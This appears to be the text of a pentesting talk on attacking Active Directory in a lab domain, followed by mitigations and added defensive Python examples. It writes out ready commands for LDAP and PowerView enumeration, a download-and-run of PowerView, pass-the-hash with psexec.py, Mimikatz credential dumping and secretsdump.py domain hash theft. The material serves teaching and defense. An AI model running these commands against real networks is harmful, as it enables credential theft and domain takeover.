Offensive Active Directory 101


Disclaimer
Michael Ritter
whoami

About me:
➢ Previously: Professional at Deloitte
➢ 5 years pentesting experience
➢ OSCP Certified
➢ Currently researching Purple Teaming topics

Daily work:
➢ Coordination and management of penetration tests
➢ Performance of penetration tests
  » Infrastructure
  » Web
  » Rich-Client
➢ Security assessments of Active Directory environments

Michael Ritter
Service-Owner Pentesting
tacticx GmbH
@BigM1ke_oNe
LinkedIn
XING

3
Agenda
pwny.corp - Attack

Basics
• What is Active Directory?
• Attack Landscape
• Active Directory Kill Chain

Phase 1 – Unauthorized User


• AD Enumeration without credentials
• Gaining initial Access

Phase 2 - Unprivileged User


• Taking advantage of LDAP
• Lateral movement techniques
• Basics NTLM Relay

Phase 3 - Privileged User


• Looting the thing

Mitigations

4
Basics
What is Active Directory and who uses it?
Basics
What is Active Directory?

➢ Microsoft's answer to directory services

➢ Active Directory is a hierarchical structure that stores objects in order to:
  » Access and manage the resources of an enterprise
  » Resources such as users, groups, computers, policies etc.

➢ 95 percent of Fortune 1000 companies use Active Directory

➢ Active Directory relies on different technologies in order to provide all its features:
  » LDAP
  » DNS

➢ More information about the basics:
  » https://blogs.technet.microsoft.com/ashwinexchange/2012/12/18/understanding-active-directory-for-beginners-part-1/
6
Basics
Objects

» AD contains a lot of juicy information about the resources of an organization

» The following is an overview of the object types that exist in AD:

7
Basics
Global Catalog

➢ The global catalog provides a central repository of domain information
➢ The global catalog provides a resource for searching an Active Directory forest
➢ LDAP queries use the global catalog to search for information
➢ Domain users have read access to the global catalog

https://technet.microsoft.com/pt-pt/library/how-global-catalog-servers-work(v=ws.10).aspx
8
Attack Landscape
Active Directory – Structure

➢ Go Hunting?

@ciyinet 9
Basics
Active Directory – Privileged Accounts

➢ AD environments can be way more complex than that... Think about all the services it provides

@ciyinet 10
Basics
Broad landscape of attacks

➢ Great attack landscape

@ciyinet

@ciyinet 11
Active directory kill chain
Broad landscape of attacks

➢ Focus of this talk

https://docs.microsoft.com/de-de/advanced-threat-analytics/ata-threats
12
Phase 1
Unauthorized User aka "Getting creds"
Phase 1
Starting Point

DC

Notebooks
Terminal Server

Workstations
Attacker Exchange
15
Phase 1 - Unauthorized User
Enumerate – Common Network traffic

➢ Check out what network protocols are running and analyse them for potential weaknesses

16
Phase 1 - Unauthorized User
Enumerate DHCP

➢ DHCP info

17
Phase 1 - Unauthorized User
Enumerate DNS

➢ DNS recon

18
Phase 1 - Unauthorized User
Enumerate – Metadata from LDAP

➢ Get some information from the LDAP service


➢ This information is necessary for other devices that want to join the domain

19
Phase 1 - Unauthorized User
Enumerate – Metadata from LDAP

➢ Forest functionality level is set based on the highest OS functionality level a domain can support

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/understanding-active-directory-domain-services--ad-ds--functional-levels
20
Phase 1 - Unauthorized User
Results – AD Recon

➢ Results:
  » Domain name: pwny.lab
  » Domain Controller: pwnylabdc01.pwny.lab (10.0.3.200)
  » Subnet: 10.0.3.0/24
  » Router: 10.0.3.1
  » DC functionality level: Windows Server 2012
  » Network clients:
    » workstation01.pwny.lab
    » workstation04.pwny.lab

21
Phase 1 - Unauthorized User
Gaining Access – Lots of opportunities to get initial access

22
Phase 1 - Unauthorized User
Gaining Access – Lots of opportunities to get initial access

➢ There are many different ways to steal user credentials, like:
  » Rogue devices
  » Password spraying
  » Default passwords (Tomcat, Jenkins & Co.)
  » Missing patches
  » Cleartext passwords on file shares
  » Vulnerable web applications
  » Kerberoasting
  » Social engineering
  » Phishing
  » MITM
  » Vulnerable software versions
  » Have a look at the MITRE ATT&CK matrix
    » https://attack.mitre.org/wiki/Initial_Access
23
Phase 1 - Unauthorized User
Gaining Access – DNS fallback protocols

LLMNR, NBNS & Co.

➢ DNS fallback protocols
  ▪ Link-Local Multicast Name Resolution (LLMNR)
  ▪ NetBIOS Name Service (NBNS)
  ▪ mDNS
➢ LLMNR & NBNS allow name resolution of failed DNS requests
  • Leveraging other computers in the network
24
Network Layer Protection Analysis & Attack
Name resolution process

➢ Name resolution process:
  1. Local "hosts" file
  2. DNS server
  3. Fallback protocols: LLMNR/NBNS/mDNS

➢ Usage of LLMNR & NBNS in the PWNY.corp network
Network Layer Protection Analysis & Attack
LLMNR/NBNS Poisoning Attack

1. Connect to //filsrv (Victim → DNS Server)
2. I don't know that one (DNS Server → Victim)
3. Anyone know //filsrv? (Victim → Network-Clients, among them the Attacker)

[Diagram participants: Victim, DNS Server, Network-Clients, Attacker]
26
Demo
Stealing credentials abusing LLMNR/NBT-NS
Phase 1 - Unauthorized User
Gaining Access

➢ Analysing the hashes
➢ Cracking the hashes

28
Phase 1 - Unauthorized User
Results

➢ Results:
» Valid user account with password
» PWNY\jar.jar-binks:Welcome2015
» Users password hashes for:
» PWNY\darth.vader
» PWNY\obi-wan.kenobi
» PWNY\chewbacca

29
Phase 2 – Unprivileged Users
Taking advantage of LDAP
Phase 2 – Unprivileged user
Escalating privileges aka lateral movement

➢ During phase 1, it was possible to compromise an unprivileged user account
  » Not a local admin on any machine
  » Not a member of any sensitive group

➢ What can you do with this?
  » Log in to webmail/user mailbox
    » Ruler
  » Enumerate available SMB shares
    » SMBMap
    » CrackMapExec
  » Use available information in the Global Catalog to your advantage

31
Phase 2 – Unprivileged user
Taking advantage of LDAP

➢ Use available information in the Global Catalog to your advantage

➢ LDAP is the underlying directory access protocol in AD
➢ No special privileges are needed to bind to LDAP - any valid account can read the entire directory! (by default)
➢ Create very flexible queries using LDAP...
➢ Examples:
  » Get a list of all domain users that contain *adm* in their account name
  » Get a list of all domain groups that contain *adm*
  » Get a list of all domain-joined systems where the operating system is like *XP* or *2000*
  » Show all groups a user is memberOf
  » Recursively look up all members of a group
  » Show all users that have a description like *pass* or *pw*

32
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

Get a list of all domain users

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b dc=pwny,dc=lab "(objectClass=user)" sAMAccountName userPrincipalName memberOf

Get a list of all domain groups

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b dc=pwny,dc=lab "(objectClass=group)" sAMAccountName member memberOf

Get a list of all domain joined systems

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b dc=pwny,dc=lab "(objectClass=computer)" name dNSHostName operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName

Recursively look up all members of a group (LDAP_MATCHING_RULE_IN_CHAIN)

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b dc=pwny,dc=lab "(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=CN=Domänen-Admins,CN=Users,DC=PWNY,DC=LAB))" | grep sAMAccountName | cut -d" " -f2

Show all groups a user is memberOf

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b dc=pwny,dc=lab "(sAMAccountName=darth.vader)" sAMAccountName userPrincipalName memberOf | grep memberOf | cut -d "=" -f2 | cut -d"," -f1

https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
33
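The same queries are the cheapest directory-hygiene audit a defender has: whatever a low-privileged account can read, an attacker holding one stolen password can read too. The following is an added example, written for this page and not part of the talk or of any tool it names. It parses LDIF as produced by `ldapsearch -LLL` (folded lines, `attr:: base64` values) offline and flags the conditions the slide's queries target; the legacy-OS check is generalized slightly beyond the slide (Server 2003 is added to XP/2000). The LDIF below is constructed sample data with fictional accounts; the attribute names are the real AD attributes used above.

```python
import base64
import re
from collections import defaultdict

# Constructed sample, shaped like `ldapsearch -LLL` output; all names and values are fictional.
SAMPLE_LDIF = """\
dn: CN=Jar Jar Binks,CN=Users,DC=pwny,DC=lab
objectClass: user
sAMAccountName: jar-jar.binks
description: Temp account, pw is Welcome2015
memberOf: CN=Domain Users,CN=Users,
 DC=pwny,DC=lab

dn: CN=svc_backup,CN=Users,DC=pwny,DC=lab
objectClass: user
sAMAccountName: svc_backup
description:: QmFja3VwIHNlcnZpY2UgLSBQYXNzd29yZCBpbiB0aWNrZXQgIzQyMzE=

dn: CN=adm_workstations,CN=Users,DC=pwny,DC=lab
objectClass: group
sAMAccountName: adm_workstations
member: CN=Obi-Wan Kenobi,CN=Users,DC=pwny,DC=lab

dn: CN=WORKSTATION01,CN=Computers,DC=pwny,DC=lab
objectClass: computer
sAMAccountName: WORKSTATION01$
name: WORKSTATION01
operatingSystem: Windows 10 Enterprise

dn: CN=LEGACYBOX,CN=Computers,DC=pwny,DC=lab
objectClass: computer
sAMAccountName: LEGACYBOX$
name: LEGACYBOX
operatingSystem: Windows XP Professional
"""


def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts, one per entry.
    Handles folded lines (leading space), base64 values ("attr:: ...") and comments."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]              # unfold a continuation line
        else:
            lines.append(raw)
    entries, current = [], None
    for line in lines + [""]:                 # the trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(dict(current))
            current = None
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):             # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if current is None:
            current = defaultdict(list)
        current[attr.strip()].append(value)
    return entries


def first(entry, attr, default=""):
    values = entry.get(attr)
    return values[0] if values else default


SECRET_HINT = re.compile(r"pass|pw", re.IGNORECASE)
LEGACY_OS = re.compile(r"windows (xp|2000|server 2003)", re.IGNORECASE)


def audit(entries):
    """Return (finding, object) tuples for the hygiene problems the slide's queries look for."""
    findings = []
    for e in entries:
        classes = {c.lower() for c in e.get("objectClass", [])}
        sam = first(e, "sAMAccountName", first(e, "dn", "?"))
        if "computer" in classes:
            if any(LEGACY_OS.search(v) for v in e.get("operatingSystem", [])):
                findings.append(("legacy-operating-system", first(e, "name", sam)))
            continue                          # computer objects are also 'user' in AD; skip user checks
        if "user" in classes:
            if any(SECRET_HINT.search(v) for v in e.get("description", [])):
                findings.append(("description-hints-at-password", sam))
            if "adm" in sam.lower():
                findings.append(("admin-like-user-name", sam))
        if "group" in classes and "adm" in sam.lower():
            findings.append(("admin-like-group-name", sam))
    return findings


if __name__ == "__main__":
    import sys
    text = SAMPLE_LDIF if sys.stdin.isatty() else sys.stdin.read()   # pipe ldapsearch output in
    for kind, obj in audit(parse_ldif(text)):
        print(f"{kind}: {obj}")
```

Piped the output of the user/group/computer queries above, the script lists the objects worth a closer look; the regexes are deliberately loose, since a false positive costs a minute and a password in a description field costs a domain.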
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

➢ Another nice tool for manual analysis is Active Directory Explorer from Sysinternals
  » You can use AD Explorer to easily navigate through the global catalog
  » Nice GUI to explore the environment
  » Define favorite locations
  » View object properties and attributes without having to open dialog boxes
  » Edit permissions
  » View an object's schema, and execute sophisticated searches that you can save and re-execute

34
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

35
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

36
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ PowerView is a PowerShell tool to gain network situational awareness on Windows domains
➢ No administrative credentials required
➢ My personal favorite
➢ Very useful for both "Blue" and "Red" Teams
➢ It contains a load of useful functions to identify possible issues in AD environments
  » net * functions
  » GPO functions
  » User-hunting functions
  » Domain trust functions
  » Meta functions
➢ More details can be found at:
  » https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
37
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Run PowerView from a non-domain computer

# Download
iex(iwr("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1"))

# Use an alternate credential for any PowerView function
$SecPassword = ConvertTo-SecureString 'Welcome2015' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('PWNY\jar-jar.binks', $SecPassword)

# Check if everything works
Get-NetDomain -Credential $Cred

38
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate all users, can be used for:


» Phishing and other social engineering attacks
» Password spraying
» ... be creative
# Get all the users
Get-NetUser -Credential $Cred | Format-Table name, samaccountname, userprincipalname, description

39
Phase 2 – Unprivileged user
Taking advantage of LDAP

➢ All this information can be re-used for further attacks...

➢ For example:
  » Usernames
    » Password spraying
  » Phone numbers
    » Social engineering
  » Mail addresses
    » Phishing attacks

40
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate what groups a specific user is member of


# List all groups of a specific user
Get-DomainGroup -MemberIdentity darth.vader -Credential $Cred | Format-Table cn

41
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate existing groups


# Get all existing groups
get-netgroup -Credential $Cred | Format-Table cn, distinguishedname, description
get-netgroup *adm* -Credential $Cred | Format-Table cn, distinguishedname, description

42
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate the members of a specific group

# List all members of a specific group
Get-NetGroupMember -Identity "Domänen-Admins" -Recurse -Credential $Cred | Format-Table groupname, memberdomain, membername

43
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Go for a hunt and check out users that have active sessions on work computers

# Go hunting for active user sessions
Invoke-UserHunter -ShowAll -Credential $Cred -ComputerName workstation04 | Format-Table -Property userdomain, username, computername, ipaddress

➢ Remember that one??

44
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ List members of local groups of any system that has joined the domain

# List all members of a specific local group
Get-NetLocalGroupMember -ComputerName workstation04 -GroupName Administratoren -Credential $Cred | Format-Table membername, isgroup, isdomain

➢ Remember that one??

45
Phase 2 – Unprivileged user
Lateral movement – PowerView – Key takeaways

➢ Key takeaways of the enumeration
  » obi-wan.kenobi is a member of the adm_workstations group
  » All members of the adm_workstations group have administrative rights on the workstation04.pwny.lab system
  » luke.skywalker, who is a member of "Domain Administrators", has an active session on workstation04.pwny.lab

[Diagram: User obi-wan.kenobi → Group adm_workstations → Computer workstation04 ← User luke.skywalker (Domain Administrators) → Server pwnylabdc01]
46
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

➢ BloodHound enumerates the whole AD with normal user privileges and exports it into a graph.
➢ BloodHound requires the following sets of information from an Active Directory:
  » Who is logged on where?
  » Who has admin rights where?
  » What users and groups belong to what groups?
➢ All this information can be extracted with normal user privileges.
➢ This tool becomes very useful in more complex environments
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started
47
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

Perform the following steps to use BloodHound:
1. Use the BloodHound PowerShell ingestor to collect the data
   a. Possible without administrative privileges (in most cases)
2. Set up neo4j and BloodHound
   a. Instructions: https://github.com/BloodHoundAD/Bloodhound/wiki
3. Run BloodHound and import the data

https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started
48
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

49
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

50
Phase 2 – Lateral Movement
NTLM-Relay to move lateral within a network
NTLM Relay
Using ntlmrelayx.py

➢ What are the requirements for it to work?
  » SMB signing has to be deactivated on our target
    » By default disabled on all workstations and servers except DCs
  » Authentication needs to be done with a user that has administrative privileges on the target in order to get RCE

➢ Attacks to enforce authentication:
  » LLMNR/NBNS poisoning
  » UNC path injection
  » Websites – XSS, HTML injection, directory traversal, SQL injection etc.
  » Office documents etc.
  » MITM
  » Open redirect

➢ Conclusion
  » Force the victim to authenticate to the attacker's (maybe your) machine

https://blog.netspi.com/10-places-to-stick-your-unc-path/
52
NTLM Relay
Forcing authentication using LLMNR/NBNS Poisoning Attack

1. Connect to //filsrv (Victim → DNS Server)
2. I don't know that one (DNS Server → Victim)
3. Anyone know //filsrv? (Victim → Network-Clients, among them the Attacker)

[Diagram participants: Victim, DNS Server, Network-Clients, Attacker]
53
NTLM Relay
NETNTLMv1/v2 Authentication Process

Participants: workstation01 (user obi-wan.kenobi is working on it), fileserver, pwnylabdc01

1. This is obi-wan.kenobi, I'd like to log in (workstation01 → fileserver)
2. If you are really obi-wan.kenobi, then encrypt this challenge with obi-wan.kenobi's PW hash (fileserver → workstation01)
3. Here is the encrypted challenge (workstation01 → fileserver)
4. Here is the challenge and response of obi-wan.kenobi, is that valid? (fileserver → pwnylabdc01)
5. I have compared obi-wan.kenobi's challenge & response and it is valid/invalid! (pwnylabdc01 → fileserver)
6. Access granted/denied (fileserver → workstation01)
54
NTLM Relay
Authentication Process – NETNTLMv1/v2 - Malicious

Participants: workstation01 (user obi-wan.kenobi is working on it), Attacker, workstation04, pwnylabdc01

1. This is obi-wan.kenobi, I'd like to log in (workstation01 → Attacker)
2. This is obi-wan.kenobi, I'd like to log in (Attacker → workstation04)
3. Encrypt this challenge with obi-wan.kenobi's PW hash (workstation04 → Attacker)
4. Encrypt this challenge with obi-wan.kenobi's PW hash (Attacker → workstation01)
5. Here is the encrypted challenge (workstation01 → Attacker)
6. Here is the encrypted challenge (Attacker → workstation04)
7. Here is the challenge and response of obi-wan.kenobi, is that valid? (workstation04 → pwnylabdc01)
8. I have compared obi-wan.kenobi's challenge & response and it is valid! (pwnylabdc01 → workstation04)
9. Access granted! (workstation04 → Attacker)
10. Access DENIED! (Attacker → workstation01)

Result: Remote Code Execution
55
NTLM Relay
Authentication Process – NETNTLMv1/v2 - Malicious

➢ Impacket
  » Awesome collection of Python scripts for working with network protocols
  » https://github.com/CoreSecurity/impacket

➢ What protocols are featured?


» Ethernet, Linux "Cooked" capture.
» IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
» NMB and SMB1/2/3 (high-level implementations).
» DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP,
SMB/TCP, SMB/NetBIOS and HTTP.
» Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM,
SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC

56
Demo
NTLM Relay
NTLM Relay
Results of the attack

➢ We dumped the hashes of the local SAM database on workstation04
➢ Can be used to Pass-the-Hash
➢ By default, Windows Vista and higher no longer store LM hashes on disk
➢ Benchmark on NTLM hash with Sagitta Brutalis 1080 (8x GF GTX 1080)
  » 330 GH/s on NTLM (Hashcat)

[Screenshots: LLMNR/NBNS poisoning; NTLM relay performed using ntlmrelayx.py – by default it will perform a SAM dump]

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4
https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40
58
NTLM Relay
Using ntlmrelayx.py

➢ NTLM Relay
  » Relaying hashes is possible
  » ntlmrelayx.py also offers an option to run arbitrary commands on the system
  » If the user is not admin you won't get RCE, however you can relay to other services like:
    » LDAP
    » IMAP
    » MSSQL
    » SMB

[Screenshots: Relaying to IMAP on the mail server and dumping all mails that contain the search term "password"; Relaying to the LDAP server and creating a new user]

59
Pass-the-Hash
Using psexec.py to Pass-the-Hash
Pass-the-hash
Using psexec.py to Pass-the-Hash and drop a shell

➢ Run psexec and Pass-the-Hash
  » helpdesk:500:aad3b435b51404eeaad3b435b51404ee:94c2605ea71fca715caacfaa92088150:::

# Pass-the-Hash with psexec
python psexec.py helpdesk@workstation03 -hashes aad3b435b51404eeaad3b435b51404ee:94c2605ea71fca715caacfaa92088150

61
Pass-the-Hash
Results of phase 2

➢ Key takeaway after Pass-the-Hash to workstation04
  » We have local administrative rights on workstation04 and can execute code
  » The "Domain Admin" luke.skywalker is working on this computer

[Diagram: User obi-wan.kenobi → Group adm_workstations → Computer workstation04 ← User luke.skywalker (Domain Administrators) → Server pwnylabdc01]
62
Phase 3 – Privileged Access
Keep moving laterally abusing local admin privileges
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators

➢ Administrative access to a computer means we can read process memory
  » Dumping memory contents of lsass.exe & extracting credentials
    » Sysinternals ProcDump creates a minidump of the target process
    » Use Mimikatz to extract the credentials from it
    » Will not trigger AV
  » Use Mimikatz in Metasploit to dump the credentials
    » Might trigger AV

https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Demo
Dump creds with mimikatz
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators

➢ Dump credentials with Mimikatz via Meterpreter

# Dumping creds with meterpreter in metasploit using mimikatz (make sure you use a privileged account)
getsystem
load mimikatz
mimikatz_command -f privilege::debug
mimikatz_command -f sekurlsa::logonPasswords

https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Phase 3 – Privileged user (local)
Lateral movement – PowerView – Key takeaways

➢ Key takeaway after dumping the creds
  » We have valid credentials for the user luke.skywalker
  » luke.skywalker is a member of the "Domain Admin" group, so we have administrative access to the domain controller

[Diagram: User obi-wan.kenobi → Group adm_workstations → Computer workstation04 ← User luke.skywalker (Domain Administrators) → Server pwnylabdc01]
67
Phase 3 – Privileged User
Looting the thing
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py

➢ We have administrative access to the domain controller

➢ What now? Do you want persistence?
  » Dumping all user hashes
  » Creation of golden tickets

69
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py

➢ On workstations:
  » secretsdump.py can be used to dump SAM/LSA secrets remotely
  » Performs various techniques to dump hashes from a remote machine without executing any agent there

➢ On DCs it will also:
  » For NTDS.dit it will either:
    a) Get the domain users list and all hashes of all domain users (including historical ones) as well as Kerberos keys
       » via the MS Directory Replication Service (MS-DRS) Remote Protocol
    b) Extract NTDS.dit
       » via vssadmin executed with the smbexec approach
70
Demo
Dumping all the hashes – secretsdump.py
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py

➢ Run secretsdump.py with administrative creds against the domain controller

# Dumping hashes of all domain users (including password history hashes)
python secretsdump.py pwny/luke.skywalker@pwnylabdc01
Mitigations
Preventing – AD Attacks 101
Phase 3 – Mitigations
Don't let it come so far

➢ Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk
  » The attacker has unrestricted access to all resources managed by the domain, all users, servers, workstations and data
  » The attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees.

"Once domain admin, always domain admin"


Phase 3 – Mitigations
Defense against Responder attacks

➢ Disable LLMNR and NBT-NS
  » You need to disable both, because if LLMNR is disabled, Windows will automatically attempt to use NBT-NS instead
  » Disable LLMNR via Group Policy
  » Disabling NetBIOS cannot be done via GPO

➢ Limit communication between workstations on the same network
  » Reduces attack surface

➢ Mitigation against WPAD
  » Disable WPAD via Group Policy
  » Add a DNS record "wpad" in your DNS zone
  » Only allow secure dynamic updates – Dynamic updates "Secure only"

➢ Never let anyone perform non-administrative tasks with privileged accounts

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
http://woshub.com/how-to-disable-netbios-over-tcpip-and-llmnr-using-gpo/
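Disabling LLMNR and NBT-NS fleet-wide takes time and exceptions linger, so it is worth also detecting an active poisoner. The property to exploit is the one the poisoning diagram relies on: a poisoner answers for names that nobody owns. The following is an added example, written for this page and not taken from Responder or any tool the talk names. It builds an LLMNR query (RFC 4795; the wire format is the DNS message format, multicast to 224.0.0.252 on UDP 5355) for a random name that cannot exist on a healthy network and reports any host that answers it. `build_llmnr_answer` constructs the kind of reply a poisoner would send, purely so the parser can be exercised offline; `probe_for_poisoner` needs to run on the segment being checked with a socket allowed to send multicast, and all function names are this example's own.

```python
import os
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355


def encode_name(name):
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def decode_name(packet, offset):
    """Inverse of encode_name; returns (name, offset just past the name). Follows compression pointers."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:                                   # 2-byte pointer into the packet
            pointer = struct.unpack("!H", packet[offset - 1:offset + 1])[0] & 0x3FFF
            labels.append(decode_name(packet, pointer)[0])
            offset += 1
            break
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), offset


def build_llmnr_query(name, txid):
    """LLMNR query: DNS-style header (flags 0 = QR clear) plus one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)        # QTYPE=A, QCLASS=IN


def parse_llmnr_response(packet, txid):
    """Return IPv4 addresses from A records of a response matching txid; [] for anything else."""
    try:
        rid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
        if rid != txid or not flags & 0x8000:                         # our transaction, QR set
            return []
        offset = 12
        for _ in range(qdcount):                                      # skip the echoed question
            _, offset = decode_name(packet, offset)
            offset += 4
        addrs = []
        for _ in range(ancount):
            _, offset = decode_name(packet, offset)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[offset:offset + 10])
            offset += 10
            if rtype == 1 and rdlen == 4:
                addrs.append(socket.inet_ntoa(packet[offset:offset + 4]))
            offset += rdlen
        return addrs
    except (struct.error, IndexError):
        return []                                                     # truncated or malformed


def build_llmnr_answer(query, address, ttl=30):
    """Constructed reply of the kind a poisoner sends for any name it hears (offline test input)."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    name, _ = decode_name(question, 0)
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(address)
    return header + question + answer


def probe_for_poisoner(timeout=2.0):
    """Ask the segment about a random name that cannot exist; a healthy network stays silent.
    Returns details of the first host that claims the name, or None."""
    name = "probe-" + os.urandom(4).hex()
    txid = struct.unpack("!H", os.urandom(2))[0]
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _) = sock.recvfrom(1024)
                claims = parse_llmnr_response(data, txid)
                if claims:
                    return {"name": name, "responder": src, "claims": claims}
        except socket.timeout:
            return None


if __name__ == "__main__":
    print(probe_for_poisoner() or "no LLMNR responder claimed the nonexistent name")
```

Run from a workstation on each user segment on a schedule and alert on any non-None result: the `responder` address is the host to pull off the network, and the same probe repeated with an NBT-NS query catches a poisoner that only answers NetBIOS.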
Phase 3 – Mitigations
Defense against NTLM Relay attacks

➢ Disable NTLM entirely, use Kerberos
  » Not really easy to implement

➢ Enable SMB signing, where possible
  » Can be done via Group Policy
  » Please consider compatibility of other network devices before enabling SMB signing
  » SMB signing will prevent relaying to SMB by requiring all traffic to be signed

➢ Enable LDAP signing
  » LDAP signing prevents unsigned connections to LDAP

➢ More on NTLM relay and mitigations
  » https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/
Phase 3 – Mitigations
Defense against lateral movement

➢ Deploy LAPS (Microsoft Local Administrator Password Solution)
  » Provides a solution to the issue of using a common local account with an identical password on every computer in a domain
  » https://technet.microsoft.com/en-us/library/security/3062591

➢ Do not allow the use of privileged accounts to perform non-administrative tasks
  » Provide admins with separate accounts to perform administrative duties

➢ Educate your users to exhibit secure behavior
  » Good luck with that one :D

➢ Deactivate the built-in Administrator account

➢ Restrict domain and enterprise admin accounts from authenticating to less trusted computers

➢ Establish strong password policies (complexity, history, expiration)

➢ Do not configure services or scheduled tasks to use privileged domain accounts on lower-trust computers
Phase 3 – Mitigations
Admin checklist

➢ Use PowerView, BloodHound or a similar tool to understand your environment
  » Who has admin rights? Domain-wide? Local?
  » Do they really need those privileges?
  » Do they still work here?
  » Who can log into DCs?
  » Is there a policy to avoid logins into untrusted systems with domain privileged accounts?
  » Limit service account privileges
  » Did all admins get a proper introduction to AD security?
  » Any SMB shares accessible anonymously?
Phase 3 – Mitigations
Detection of advanced attacks - Microsoft Advanced Threat Analytics

➢ Port mirroring from Domain Controllers and DNS servers to the ATA Gateway, and/or
➢ Deploying an ATA Lightweight Gateway (LGW) directly on Domain Controllers
➢ More information on Microsoft ATA:
  » https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata
Phase 3 – Mitigations
Admin checklist
Phase 3 – Mitigations
Defense against lateral movement

➢Read this:
» Mitigating Pass-the-Hash and
other Credential Theft, version 2
Credits
Shoutouts to the titans in this area
Phase 3 – Mitigations
Thank you for this journey

➢Huge shoutouts to:


» @ciyinet – Providing great slides
» @gentilkiwi – Mimikatz
» @agsolino – Creator of Impacket
» @TimMedin – Great talks
» @PyroTek3 – AD Security
» @nikhil_mitt – PowerShell training
» @byt3bl33d3r – CrackMapExec

and many more...


Questions?
